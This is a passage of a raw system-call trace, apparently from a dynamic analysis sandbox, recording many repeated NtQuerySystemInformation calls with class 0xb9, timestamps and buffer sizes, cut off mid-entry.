NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0270.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0270.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0270.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0270.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0270.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x20, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0270.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0270.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0270.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0270.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0270.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, 